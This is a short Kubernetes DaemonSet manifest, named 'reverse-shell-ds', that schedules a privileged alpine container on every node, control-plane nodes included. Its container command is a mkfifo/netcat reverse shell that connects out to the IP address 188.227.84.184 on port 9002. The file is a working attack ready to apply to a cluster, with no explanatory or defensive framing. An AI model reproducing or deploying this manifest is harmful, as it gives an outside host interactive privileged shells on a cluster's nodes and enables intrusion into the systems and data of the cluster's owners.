apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: reverse-shell-ds
spec:
  selector:
    matchLabels:
      name: reverse-shell
  template:
    metadata:
      labels:
        name: reverse-shell
    spec:
      tolerations:
      - key: node-role.kubernetes.io/control-plane
        operator: Exists
        effect: NoSchedule
      containers:
      - name: shell
        image: alpine
        securityContext:
          privileged: true
        command: ["/bin/sh", "-c"]
        args:
        - |
          rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 188.227.84.184 9002 >/tmp/f
